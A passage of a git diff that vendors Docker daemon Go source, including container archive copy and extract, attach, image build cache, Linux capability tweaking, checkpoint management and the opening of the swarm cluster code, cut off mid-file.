defer func() { + if err != nil { + // unmount any volumes + container.DetachAndUnmount(daemon.LogVolumeEvent) + // unmount the container's rootfs + daemon.Unmount(container) + } + }() + + if err = daemon.mountVolumes(container); err != nil { + return nil, nil, err + } + + resolvedPath, absPath, err := container.ResolvePath(path) + if err != nil { + return nil, nil, err + } + + stat, err = container.StatPath(resolvedPath, absPath) + if err != nil { + return nil, nil, err + } + + // We need to rebase the archive entries if the last element of the + // resolved path was a symlink that was evaluated and is now different + // than the requested path. For example, if the given path was "/foo/bar/", + // but it resolved to "/var/lib/docker/containers/{id}/foo/baz/", we want + // to ensure that the archive entries start with "bar" and not "baz". This + // also catches the case when the root directory of the container is + // requested: we want the archive entries to start with "/" and not the + // container ID. + data, err := archive.TarResourceRebase(resolvedPath, filepath.Base(absPath)) + if err != nil { + return nil, nil, err + } + + content = ioutils.NewReadCloserWrapper(data, func() error { + err := data.Close() + container.DetachAndUnmount(daemon.LogVolumeEvent) + daemon.Unmount(container) + container.Unlock() + return err + }) + + daemon.LogContainerEvent(container, "archive-path") + + return content, stat, nil +} + +// containerExtractToDir extracts the given tar archive to the specified location in the +// filesystem of this container. The given path must be of a directory in the +// container. If it is not, the error will be ErrExtractPointNotDirectory. If +// noOverwriteDirNonDir is true then it will be an error if unpacking the +// given content would cause an existing directory to be replaced with a non- +// directory and vice versa. +func (daemon *Daemon) containerExtractToDir(container *container.Container, path string, noOverwriteDirNonDir bool, content io.Reader) (err error) { + container.Lock() + defer container.Unlock() + + if err = daemon.Mount(container); err != nil { + return err + } + defer daemon.Unmount(container) + + err = daemon.mountVolumes(container) + defer container.DetachAndUnmount(daemon.LogVolumeEvent) + if err != nil { + return err + } + + // Check if a drive letter supplied, it must be the system drive. No-op except on Windows + path, err = system.CheckSystemDriveAndRemoveDriveLetter(path) + if err != nil { + return err + } + + // The destination path needs to be resolved to a host path, with all + // symbolic links followed in the scope of the container's rootfs. Note + // that we do not use `container.ResolvePath(path)` here because we need + // to also evaluate the last path element if it is a symlink. This is so + // that you can extract an archive to a symlink that points to a directory. + + // Consider the given path as an absolute path in the container. + absPath := archive.PreserveTrailingDotOrSeparator(filepath.Join(string(filepath.Separator), path), path) + + // This will evaluate the last path element if it is a symlink. + resolvedPath, err := container.GetResourcePath(absPath) + if err != nil { + return err + } + + stat, err := os.Lstat(resolvedPath) + if err != nil { + return err + } + + if !stat.IsDir() { + return ErrExtractPointNotDirectory + } + + // Need to check if the path is in a volume. If it is, it cannot be in a + // read-only volume. If it is not in a volume, the container cannot be + // configured with a read-only rootfs. + + // Use the resolved path relative to the container rootfs as the new + // absPath. This way we fully follow any symlinks in a volume that may + // lead back outside the volume. + // + // The Windows implementation of filepath.Rel in golang 1.4 does not + // support volume style file path semantics. On Windows when using the + // filter driver, we are guaranteed that the path will always be + // a volume file path. + var baseRel string + if strings.HasPrefix(resolvedPath, `\\?\Volume{`) { + if strings.HasPrefix(resolvedPath, container.BaseFS) { + baseRel = resolvedPath[len(container.BaseFS):] + if baseRel[:1] == `\` { + baseRel = baseRel[1:] + } + } + } else { + baseRel, err = filepath.Rel(container.BaseFS, resolvedPath) + } + if err != nil { + return err + } + // Make it an absolute path. + absPath = filepath.Join(string(filepath.Separator), baseRel) + + toVolume, err := checkIfPathIsInAVolume(container, absPath) + if err != nil { + return err + } + + if !toVolume && container.HostConfig.ReadonlyRootfs { + return ErrRootFSReadOnly + } + + uid, gid := daemon.GetRemappedUIDGID() + options := &archive.TarOptions{ + NoOverwriteDirNonDir: noOverwriteDirNonDir, + ChownOpts: &archive.TarChownOptions{ + UID: uid, GID: gid, // TODO: should all ownership be set to root (either real or remapped)? + }, + } + if err := chrootarchive.Untar(content, resolvedPath, options); err != nil { + return err + } + + daemon.LogContainerEvent(container, "extract-to-dir") + + return nil +} + +func (daemon *Daemon) containerCopy(container *container.Container, resource string) (rc io.ReadCloser, err error) { + container.Lock() + + defer func() { + if err != nil { + // Wait to unlock the container until the archive is fully read + // (see the ReadCloseWrapper func below) or if there is an error + // before that occurs. + container.Unlock() + } + }() + + if err := daemon.Mount(container); err != nil { + return nil, err + } + + defer func() { + if err != nil { + // unmount any volumes + container.DetachAndUnmount(daemon.LogVolumeEvent) + // unmount the container's rootfs + daemon.Unmount(container) + } + }() + + if err := daemon.mountVolumes(container); err != nil { + return nil, err + } + + basePath, err := container.GetResourcePath(resource) + if err != nil { + return nil, err + } + stat, err := os.Stat(basePath) + if err != nil { + return nil, err + } + var filter []string + if !stat.IsDir() { + d, f := filepath.Split(basePath) + basePath = d + filter = []string{f} + } else { + filter = []string{filepath.Base(basePath)} + basePath = filepath.Dir(basePath) + } + archive, err := archive.TarWithOptions(basePath, &archive.TarOptions{ + Compression: archive.Uncompressed, + IncludeFiles: filter, + }) + if err != nil { + return nil, err + } + + reader := ioutils.NewReadCloserWrapper(archive, func() error { + err := archive.Close() + container.DetachAndUnmount(daemon.LogVolumeEvent) + daemon.Unmount(container) + container.Unlock() + return err + }) + daemon.LogContainerEvent(container, "copy") + return reader, nil +} + +// CopyOnBuild copies/extracts a source FileInfo to a destination path inside a container +// specified by a container object. +// TODO: make sure callers don't unnecessarily convert destPath with filepath.FromSlash (Copy does it already). +// CopyOnBuild should take in abstract paths (with slashes) and the implementation should convert it to OS-specific paths. +func (daemon *Daemon) CopyOnBuild(cID string, destPath string, src builder.FileInfo, decompress bool) error { + srcPath := src.Path() + destExists := true + destDir := false + rootUID, rootGID := daemon.GetRemappedUIDGID() + + // Work in daemon-local OS specific file paths + destPath = filepath.FromSlash(destPath) + + c, err := daemon.GetContainer(cID) + if err != nil { + return err + } + err = daemon.Mount(c) + if err != nil { + return err + } + defer daemon.Unmount(c) + + dest, err := c.GetResourcePath(destPath) + if err != nil { + return err + } + + // Preserve the trailing slash + // TODO: why are we appending another path separator if there was already one? + if strings.HasSuffix(destPath, string(os.PathSeparator)) || destPath == "." { + destDir = true + dest += string(os.PathSeparator) + } + + destPath = dest + + destStat, err := os.Stat(destPath) + if err != nil { + if !os.IsNotExist(err) { + //logrus.Errorf("Error performing os.Stat on %s. %s", destPath, err) + return err + } + destExists = false + } + + uidMaps, gidMaps := daemon.GetUIDGIDMaps() + archiver := &archive.Archiver{ + Untar: chrootarchive.Untar, + UIDMaps: uidMaps, + GIDMaps: gidMaps, + } + + if src.IsDir() { + // copy as directory + if err := archiver.CopyWithTar(srcPath, destPath); err != nil { + return err + } + return fixPermissions(srcPath, destPath, rootUID, rootGID, destExists) + } + if decompress && archive.IsArchivePath(srcPath) { + // Only try to untar if it is a file and that we've been told to decompress (when ADD-ing a remote file) + + // First try to unpack the source as an archive + // to support the untar feature we need to clean up the path a little bit + // because tar is very forgiving. First we need to strip off the archive's + // filename from the path but this is only added if it does not end in slash + tarDest := destPath + if strings.HasSuffix(tarDest, string(os.PathSeparator)) { + tarDest = filepath.Dir(destPath) + } + + // try to successfully untar the orig + err := archiver.UntarPath(srcPath, tarDest) + /* + if err != nil { + logrus.Errorf("Couldn't untar to %s: %v", tarDest, err) + } + */ + return err + } + + // only needed for fixPermissions, but might as well put it before CopyFileWithTar + if destDir || (destExists && destStat.IsDir()) { + destPath = filepath.Join(destPath, src.Name()) + } + + if err := idtools.MkdirAllNewAs(filepath.Dir(destPath), 0755, rootUID, rootGID); err != nil { + return err + } + if err := archiver.CopyFileWithTar(srcPath, destPath); err != nil { + return err + } + + return fixPermissions(srcPath, destPath, rootUID, rootGID, destExists) +} diff --git a/vendor/github.com/docker/docker/daemon/archive_unix.go b/vendor/github.com/docker/docker/daemon/archive_unix.go new file mode 100644 index 0000000000..47666fe5e8 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/archive_unix.go @@ -0,0 +1,58 @@ +// +build !windows + +package daemon + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/container" +) + +// checkIfPathIsInAVolume checks if the path is in a volume. If it is, it +// cannot be in a read-only volume. If it is not in a volume, the container +// cannot be configured with a read-only rootfs. +func checkIfPathIsInAVolume(container *container.Container, absPath string) (bool, error) { + var toVolume bool + for _, mnt := range container.MountPoints { + if toVolume = mnt.HasResource(absPath); toVolume { + if mnt.RW { + break + } + return false, ErrVolumeReadonly + } + } + return toVolume, nil +} + +func fixPermissions(source, destination string, uid, gid int, destExisted bool) error { + // If the destination didn't already exist, or the destination isn't a + // directory, then we should Lchown the destination. Otherwise, we shouldn't + // Lchown the destination. + destStat, err := os.Stat(destination) + if err != nil { + // This should *never* be reached, because the destination must've already + // been created while untar-ing the context. + return err + } + doChownDestination := !destExisted || !destStat.IsDir() + + // We Walk on the source rather than on the destination because we don't + // want to change permissions on things we haven't created or modified. + return filepath.Walk(source, func(fullpath string, info os.FileInfo, err error) error { + // Do not alter the walk root iff. it existed before, as it doesn't fall under + // the domain of "things we should chown". + if !doChownDestination && (source == fullpath) { + return nil + } + + // Path is prefixed by source: substitute with destination instead. + cleaned, err := filepath.Rel(source, fullpath) + if err != nil { + return err + } + + fullpath = filepath.Join(destination, cleaned) + return os.Lchown(fullpath, uid, gid) + }) +} diff --git a/vendor/github.com/docker/docker/daemon/archive_windows.go b/vendor/github.com/docker/docker/daemon/archive_windows.go new file mode 100644 index 0000000000..b3a1045341 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/archive_windows.go @@ -0,0 +1,18 @@ +package daemon + +import "github.com/docker/docker/container" + +// checkIfPathIsInAVolume checks if the path is in a volume. If it is, it +// cannot be in a read-only volume. If it is not in a volume, the container +// cannot be configured with a read-only rootfs. +// +// This is a no-op on Windows which does not support read-only volumes, or +// extracting to a mount point inside a volume. TODO Windows: FIXME Post-TP5 +func checkIfPathIsInAVolume(container *container.Container, absPath string) (bool, error) { + return false, nil +} + +func fixPermissions(source, destination string, uid, gid int, destExisted bool) error { + // chown is not supported on Windows + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/attach.go b/vendor/github.com/docker/docker/daemon/attach.go new file mode 100644 index 0000000000..917237dd89 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/attach.go @@ -0,0 +1,147 @@ +package daemon + +import ( + "fmt" + "io" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/pkg/stdcopy" + "github.com/docker/docker/pkg/term" +) + +// ContainerAttach attaches to logs according to the config passed in. See ContainerAttachConfig. +func (daemon *Daemon) ContainerAttach(prefixOrName string, c *backend.ContainerAttachConfig) error { + keys := []byte{} + var err error + if c.DetachKeys != "" { + keys, err = term.ToBytes(c.DetachKeys) + if err != nil { + return fmt.Errorf("Invalid escape keys (%s) provided", c.DetachKeys) + } + } + + container, err := daemon.GetContainer(prefixOrName) + if err != nil { + return err + } + if container.IsPaused() { + err := fmt.Errorf("Container %s is paused. Unpause the container before attach", prefixOrName) + return errors.NewRequestConflictError(err) + } + + inStream, outStream, errStream, err := c.GetStreams() + if err != nil { + return err + } + defer inStream.Close() + + if !container.Config.Tty && c.MuxStreams { + errStream = stdcopy.NewStdWriter(errStream, stdcopy.Stderr) + outStream = stdcopy.NewStdWriter(outStream, stdcopy.Stdout) + } + + var stdin io.ReadCloser + var stdout, stderr io.Writer + + if c.UseStdin { + stdin = inStream + } + if c.UseStdout { + stdout = outStream + } + if c.UseStderr { + stderr = errStream + } + + if err := daemon.containerAttach(container, stdin, stdout, stderr, c.Logs, c.Stream, keys); err != nil { + fmt.Fprintf(outStream, "Error attaching: %s\n", err) + } + return nil +} + +// ContainerAttachRaw attaches the provided streams to the container's stdio +func (daemon *Daemon) ContainerAttachRaw(prefixOrName string, stdin io.ReadCloser, stdout, stderr io.Writer, stream bool) error { + container, err := daemon.GetContainer(prefixOrName) + if err != nil { + return err + } + return daemon.containerAttach(container, stdin, stdout, stderr, false, stream, nil) +} + +func (daemon *Daemon) containerAttach(c *container.Container, stdin io.ReadCloser, stdout, stderr io.Writer, logs, stream bool, keys []byte) error { + if logs { + logDriver, err := daemon.getLogger(c) + if err != nil { + return err + } + cLog, ok := logDriver.(logger.LogReader) + if !ok { + return logger.ErrReadLogsNotSupported + } + logs := cLog.ReadLogs(logger.ReadConfig{Tail: -1}) + + LogLoop: + for { + select { + case msg, ok := <-logs.Msg: + if !ok { + break LogLoop + } + if msg.Source == "stdout" && stdout != nil { + stdout.Write(msg.Line) + } + if msg.Source == "stderr" && stderr != nil { + stderr.Write(msg.Line) + } + case err := <-logs.Err: + logrus.Errorf("Error streaming logs: %v", err) + break LogLoop + } + } + } + + daemon.LogContainerEvent(c, "attach") + + //stream + if stream { + var stdinPipe io.ReadCloser + if stdin != nil { + r, w := io.Pipe() + go func() { + defer w.Close() + defer logrus.Debug("Closing buffered stdin pipe") + io.Copy(w, stdin) + }() + stdinPipe = r + } + + waitChan := make(chan struct{}) + if c.Config.StdinOnce && !c.Config.Tty { + go func() { + c.WaitStop(-1 * time.Second) + close(waitChan) + }() + } + + err := <-c.Attach(stdinPipe, stdout, stderr, keys) + if err != nil { + if _, ok := err.(container.DetachError); ok { + daemon.LogContainerEvent(c, "detach") + } else { + logrus.Errorf("attach failed with error: %v", err) + } + } + + // If we are in stdinonce mode, wait for the process to end + // otherwise, simply return + if c.Config.StdinOnce && !c.Config.Tty { + <-waitChan + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/auth.go b/vendor/github.com/docker/docker/daemon/auth.go new file mode 100644 index 0000000000..f5f4d7bf24 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/auth.go @@ -0,0 +1,13 @@ +package daemon + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/dockerversion" +) + +// AuthenticateToRegistry checks the validity of credentials in authConfig +func (daemon *Daemon) AuthenticateToRegistry(ctx context.Context, authConfig *types.AuthConfig) (string, string, error) { + return daemon.RegistryService.Auth(ctx, authConfig, dockerversion.DockerUserAgent(ctx)) +} diff --git a/vendor/github.com/docker/docker/daemon/bindmount_solaris.go b/vendor/github.com/docker/docker/daemon/bindmount_solaris.go new file mode 100644 index 0000000000..87bf3ef72e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/bindmount_solaris.go @@ -0,0 +1,5 @@ +// +build solaris + +package daemon + +const bindMountType = "lofs" diff --git a/vendor/github.com/docker/docker/daemon/bindmount_unix.go b/vendor/github.com/docker/docker/daemon/bindmount_unix.go new file mode 100644 index 0000000000..3966babb41 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/bindmount_unix.go @@ -0,0 +1,5 @@ +// +build linux freebsd + +package daemon + +const bindMountType = "bind" diff --git a/vendor/github.com/docker/docker/daemon/cache.go b/vendor/github.com/docker/docker/daemon/cache.go new file mode 100644 index 0000000000..a2c2c137f5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cache.go @@ -0,0 +1,254 @@ +package daemon + +import ( + "encoding/json" + "fmt" + "reflect" + "strings" + + "github.com/Sirupsen/logrus" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/runconfig" + "github.com/pkg/errors" +) + +// getLocalCachedImage returns the most recent created image that is a child +// of the image with imgID, that had the same config when it was +// created. nil is returned if a child cannot be found. An error is +// returned if the parent image cannot be found. +func (daemon *Daemon) getLocalCachedImage(imgID image.ID, config *containertypes.Config) (*image.Image, error) { + // Loop on the children of the given image and check the config + getMatch := func(siblings []image.ID) (*image.Image, error) { + var match *image.Image + for _, id := range siblings { + img, err := daemon.imageStore.Get(id) + if err != nil { + return nil, fmt.Errorf("unable to find image %q", id) + } + + if runconfig.Compare(&img.ContainerConfig, config) { + // check for the most up to date match + if match == nil || match.Created.Before(img.Created) { + match = img + } + } + } + return match, nil + } + + // In this case, this is `FROM scratch`, which isn't an actual image. + if imgID == "" { + images := daemon.imageStore.Map() + var siblings []image.ID + for id, img := range images { + if img.Parent == imgID { + siblings = append(siblings, id) + } + } + return getMatch(siblings) + } + + // find match from child images + siblings := daemon.imageStore.Children(imgID) + return getMatch(siblings) +} + +// MakeImageCache creates a stateful image cache. +func (daemon *Daemon) MakeImageCache(sourceRefs []string) builder.ImageCache { + if len(sourceRefs) == 0 { + return &localImageCache{daemon} + } + + cache := &imageCache{daemon: daemon, localImageCache: &localImageCache{daemon}} + + for _, ref := range sourceRefs { + img, err := daemon.GetImage(ref) + if err != nil { + logrus.Warnf("Could not look up %s for cache resolution, skipping: %+v", ref, err) + continue + } + cache.sources = append(cache.sources, img) + } + + return cache +} + +// localImageCache is cache based on parent chain. +type localImageCache struct { + daemon *Daemon +} + +func (lic *localImageCache) GetCache(imgID string, config *containertypes.Config) (string, error) { + return getImageIDAndError(lic.daemon.getLocalCachedImage(image.ID(imgID), config)) +} + +// imageCache is cache based on history objects. Requires initial set of images. +type imageCache struct { + sources []*image.Image + daemon *Daemon + localImageCache *localImageCache +} + +func (ic *imageCache) restoreCachedImage(parent, target *image.Image, cfg *containertypes.Config) (image.ID, error) { + var history []image.History + rootFS := image.NewRootFS() + lenHistory := 0 + if parent != nil { + history = parent.History + rootFS = parent.RootFS + lenHistory = len(parent.History) + } + history = append(history, target.History[lenHistory]) + if layer := getLayerForHistoryIndex(target, lenHistory); layer != "" { + rootFS.Append(layer) + } + + config, err := json.Marshal(&image.Image{ + V1Image: image.V1Image{ + DockerVersion: dockerversion.Version, + Config: cfg, + Architecture: target.Architecture, + OS: target.OS, + Author: target.Author, + Created: history[len(history)-1].Created, + }, + RootFS: rootFS, + History: history, + OSFeatures: target.OSFeatures, + OSVersion: target.OSVersion, + }) + if err != nil { + return "", errors.Wrap(err, "failed to marshal image config") + } + + imgID, err := ic.daemon.imageStore.Create(config) + if err != nil { + return "", errors.Wrap(err, "failed to create cache image") + } + + if parent != nil { + if err := ic.daemon.imageStore.SetParent(imgID, parent.ID()); err != nil { + return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID()) + } + } + return imgID, nil +} + +func (ic *imageCache) isParent(imgID, parentID image.ID) bool { + nextParent, err := ic.daemon.imageStore.GetParent(imgID) + if err != nil { + return false + } + if nextParent == parentID { + return true + } + return ic.isParent(nextParent, parentID) +} + +func (ic *imageCache) GetCache(parentID string, cfg *containertypes.Config) (string, error) { + imgID, err := ic.localImageCache.GetCache(parentID, cfg) + if err != nil { + return "", err + } + if imgID != "" { + for _, s := range ic.sources { + if ic.isParent(s.ID(), image.ID(imgID)) { + return imgID, nil + } + } + } + + var parent *image.Image + lenHistory := 0 + if parentID != "" { + parent, err = ic.daemon.imageStore.Get(image.ID(parentID)) + if err != nil { + return "", errors.Wrapf(err, "unable to find image %v", parentID) + } + lenHistory = len(parent.History) + } + + for _, target := range ic.sources { + if !isValidParent(target, parent) || !isValidConfig(cfg, target.History[lenHistory]) { + continue + } + + if len(target.History)-1 == lenHistory { // last + if parent != nil { + if err := ic.daemon.imageStore.SetParent(target.ID(), parent.ID()); err != nil { + return "", errors.Wrapf(err, "failed to set parent for %v to %v", target.ID(), parent.ID()) + } + } + return target.ID().String(), nil + } + + imgID, err := ic.restoreCachedImage(parent, target, cfg) + if err != nil { + return "", errors.Wrapf(err, "failed to restore cached image from %q to %v", parentID, target.ID()) + } + + ic.sources = []*image.Image{target} // avoid jumping to different target, tuned for safety atm + return imgID.String(), nil + } + + return "", nil +} + +func getImageIDAndError(img *image.Image, err error) (string, error) { + if img == nil || err != nil { + return "", err + } + return img.ID().String(), nil +} + +func isValidParent(img, parent *image.Image) bool { + if len(img.History) == 0 { + return false + } + if parent == nil || len(parent.History) == 0 && len(parent.RootFS.DiffIDs) == 0 { + return true + } + if len(parent.History) >= len(img.History) { + return false + } + if len(parent.RootFS.DiffIDs) >= len(img.RootFS.DiffIDs) { + return false + } + + for i, h := range parent.History { + if !reflect.DeepEqual(h, img.History[i]) { + return false + } + } + for i, d := range parent.RootFS.DiffIDs { + if d != img.RootFS.DiffIDs[i] { + return false + } + } + return true +} + +func getLayerForHistoryIndex(image *image.Image, index int) layer.DiffID { + layerIndex := 0 + for i, h := range image.History { + if i == index { + if h.EmptyLayer { + return "" + } + break + } + if !h.EmptyLayer { + layerIndex++ + } + } + return image.RootFS.DiffIDs[layerIndex] // validate? +} + +func isValidConfig(cfg *containertypes.Config, h image.History) bool { + // todo: make this format better than join that loses data + return strings.Join(cfg.Cmd, " ") == h.CreatedBy +} diff --git a/vendor/github.com/docker/docker/daemon/caps/utils_unix.go b/vendor/github.com/docker/docker/daemon/caps/utils_unix.go new file mode 100644 index 0000000000..c99485f51d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/caps/utils_unix.go @@ -0,0 +1,131 @@ +// +build !windows + +package caps + +import ( + "fmt" + "strings" + + "github.com/docker/docker/pkg/stringutils" + "github.com/syndtr/gocapability/capability" +) + +var capabilityList Capabilities + +func init() { + last := capability.CAP_LAST_CAP + // hack for RHEL6 which has no /proc/sys/kernel/cap_last_cap + if last == capability.Cap(63) { + last = capability.CAP_BLOCK_SUSPEND + } + for _, cap := range capability.List() { + if cap > last { + continue + } + capabilityList = append(capabilityList, + &CapabilityMapping{ + Key: "CAP_" + strings.ToUpper(cap.String()), + Value: cap, + }, + ) + } +} + +type ( + // CapabilityMapping maps linux capability name to its value of capability.Cap type + // Capabilities is one of the security systems in Linux Security Module (LSM) + // framework provided by the kernel. + // For more details on capabilities, see http://man7.org/linux/man-pages/man7/capabilities.7.html + CapabilityMapping struct { + Key string `json:"key,omitempty"` + Value capability.Cap `json:"value,omitempty"` + } + // Capabilities contains all CapabilityMapping + Capabilities []*CapabilityMapping +) + +// String returns of CapabilityMapping +func (c *CapabilityMapping) String() string { + return c.Key +} + +// GetCapability returns CapabilityMapping which contains specific key +func GetCapability(key string) *CapabilityMapping { + for _, capp := range capabilityList { + if capp.Key == key { + cpy := *capp + return &cpy + } + } + return nil +} + +// GetAllCapabilities returns all of the capabilities +func GetAllCapabilities() []string { + output := make([]string, len(capabilityList)) + for i, capability := range capabilityList { + output[i] = capability.String() + } + return output +} + +// TweakCapabilities can tweak capabilities by adding or dropping capabilities +// based on the basics capabilities. +func TweakCapabilities(basics, adds, drops []string) ([]string, error) { + var ( + newCaps []string + allCaps = GetAllCapabilities() + ) + + // FIXME(tonistiigi): docker format is without CAP_ prefix, oci is with prefix + // Currently they are mixed in here. We should do conversion in one place. + + // look for invalid cap in the drop list + for _, cap := range drops { + if strings.ToLower(cap) == "all" { + continue + } + + if !stringutils.InSlice(allCaps, "CAP_"+cap) { + return nil, fmt.Errorf("Unknown capability drop: %q", cap) + } + } + + // handle --cap-add=all + if stringutils.InSlice(adds, "all") { + basics = allCaps + } + + if !stringutils.InSlice(drops, "all") { + for _, cap := range basics { + // skip `all` already handled above + if strings.ToLower(cap) == "all" { + continue + } + + // if we don't drop `all`, add back all the non-dropped caps + if !stringutils.InSlice(drops, cap[4:]) { + newCaps = append(newCaps, strings.ToUpper(cap)) + } + } + } + + for _, cap := range adds { + // skip `all` already handled above + if strings.ToLower(cap) == "all" { + continue + } + + cap = "CAP_" + cap + + if !stringutils.InSlice(allCaps, cap) { + return nil, fmt.Errorf("Unknown capability to add: %q", cap) + } + + // add cap if not already in the list + if !stringutils.InSlice(newCaps, cap) { + newCaps = append(newCaps, strings.ToUpper(cap)) + } + } + return newCaps, nil +} diff --git a/vendor/github.com/docker/docker/daemon/changes.go b/vendor/github.com/docker/docker/daemon/changes.go new file mode 100644 index 0000000000..fc8cd2752c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/changes.go @@ -0,0 +1,31 @@ +package daemon + +import ( + "errors" + "runtime" + "time" + + "github.com/docker/docker/pkg/archive" +) + +// ContainerChanges returns a list of container fs changes +func (daemon *Daemon) ContainerChanges(name string) ([]archive.Change, error) { + start := time.Now() + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + if runtime.GOOS == "windows" && container.IsRunning() { + return nil, errors.New("Windows does not support diff of a running container") + } + + container.Lock() + defer container.Unlock() + c, err := container.RWLayer.Changes() + if err != nil { + return nil, err + } + containerActions.WithValues("changes").UpdateSince(start) + return c, nil +} diff --git a/vendor/github.com/docker/docker/daemon/checkpoint.go b/vendor/github.com/docker/docker/daemon/checkpoint.go new file mode 100644 index 0000000000..27181743f5 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/checkpoint.go @@ -0,0 +1,110 @@ +package daemon + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "os" + "path/filepath" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/utils" +) + +var ( + validCheckpointNameChars = utils.RestrictedNameChars + validCheckpointNamePattern = utils.RestrictedNamePattern +) + +// CheckpointCreate checkpoints the process running in a container with CRIU +func (daemon *Daemon) CheckpointCreate(name string, config types.CheckpointCreateOptions) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + if !container.IsRunning() { + return fmt.Errorf("Container %s not running", name) + } + + var checkpointDir string + if config.CheckpointDir != "" { + checkpointDir = config.CheckpointDir + } else { + checkpointDir = container.CheckpointDir() + } + + if !validCheckpointNamePattern.MatchString(config.CheckpointID) { + return fmt.Errorf("Invalid checkpoint ID (%s), only %s are allowed", config.CheckpointID, validCheckpointNameChars) + } + + err = daemon.containerd.CreateCheckpoint(container.ID, config.CheckpointID, checkpointDir, config.Exit) + if err != nil { + return fmt.Errorf("Cannot checkpoint container %s: %s", name, err) + } + + daemon.LogContainerEvent(container, "checkpoint") + + return nil +} + +// CheckpointDelete deletes the specified checkpoint +func (daemon *Daemon) CheckpointDelete(name string, config types.CheckpointDeleteOptions) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + var checkpointDir string + if config.CheckpointDir != "" { + checkpointDir = config.CheckpointDir + } else { + checkpointDir = container.CheckpointDir() + } + + return os.RemoveAll(filepath.Join(checkpointDir, config.CheckpointID)) +} + +// CheckpointList lists all checkpoints of the specified container +func (daemon *Daemon) CheckpointList(name string, config types.CheckpointListOptions) ([]types.Checkpoint, error) { + var out []types.Checkpoint + + container, err := daemon.GetContainer(name) + if err != nil { + return nil, err + } + + var checkpointDir string + if config.CheckpointDir != "" { + checkpointDir = config.CheckpointDir + } else { + checkpointDir = container.CheckpointDir() + } + + if err := os.MkdirAll(checkpointDir, 0755); err != nil { + return nil, err + } + + dirs, err := ioutil.ReadDir(checkpointDir) + if err != nil { + return nil, err + } + + for _, d := range dirs { + if !d.IsDir() { + continue + } + path := filepath.Join(checkpointDir, d.Name(), "config.json") + data, err := ioutil.ReadFile(path) + if err != nil { + return nil, err + } + var cpt types.Checkpoint + if err := json.Unmarshal(data, &cpt); err != nil { + return nil, err + } + out = append(out, cpt) + } + + return out, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster.go b/vendor/github.com/docker/docker/daemon/cluster.go new file mode 100644 index 0000000000..98b2aa1e04 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster.go @@ -0,0 +1,12 @@ +package daemon + +import ( + apitypes "github.com/docker/docker/api/types" +) + +// Cluster is the interface for github.com/docker/docker/daemon/cluster.(*Cluster). +type Cluster interface { + GetNetwork(input string) (apitypes.NetworkResource, error) + GetNetworks() ([]apitypes.NetworkResource, error) + RemoveNetwork(input string) error +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/cluster.go b/vendor/github.com/docker/docker/daemon/cluster/cluster.go new file mode 100644 index 0000000000..4af035b523 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/cluster.go @@ -0,0 +1,1973 @@ +package cluster + +import ( + "crypto/x509" + "encoding/base64" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net" + "os" + "path/filepath" + "runtime" + "strings" + "sync" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + distreference "github.com/docker/distribution/reference" + apierrors "github.com/docker/docker/api/errors" + apitypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/network" + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + executorpkg "github.com/docker/docker/daemon/cluster/executor" + "github.com/docker/docker/daemon/cluster/executor/container" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/signal" + "github.com/docker/docker/pkg/stdcopy" + "github.com/docker/docker/reference" + "github.com/docker/docker/runconfig" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/manager/encryption" + swarmnode "github.com/docker/swarmkit/node" + "github.com/docker/swarmkit/protobuf/ptypes" + "github.com/pkg/errors" + "golang.org/x/net/context" + "google.golang.org/grpc" +) + +const swarmDirName = "swarm" +const controlSocket = "control.sock" +const swarmConnectTimeout = 20 * time.Second +const swarmRequestTimeout = 20 * time.Second +const stateFile = "docker-state.json" +const defaultAddr = "0.0.0.0:2377" + +const ( + initialReconnectDelay = 100 * time.Millisecond + maxReconnectDelay = 30 * time.Second + contextPrefix = "com.docker.swarm" +) + +// ErrNoSwarm is returned on leaving a cluster that was never initialized +var ErrNoSwarm = fmt.Errorf("This node is not part of a swarm") + +// ErrSwarmExists is returned on initialize or join request for a cluster that has already been activated +var ErrSwarmExists = fmt.Errorf("This node is already part of a swarm. Use \"docker swarm leave\" to leave this swarm and join another one.") + +// ErrPendingSwarmExists is returned on initialize or join request for a cluster that is already processing a similar request but has not succeeded yet. +var ErrPendingSwarmExists = fmt.Errorf("This node is processing an existing join request that has not succeeded yet. Use \"docker swarm leave\" to cancel the current request.") + +// ErrSwarmJoinTimeoutReached is returned when cluster join could not complete before timeout was reached. +var ErrSwarmJoinTimeoutReached = fmt.Errorf("Timeout was 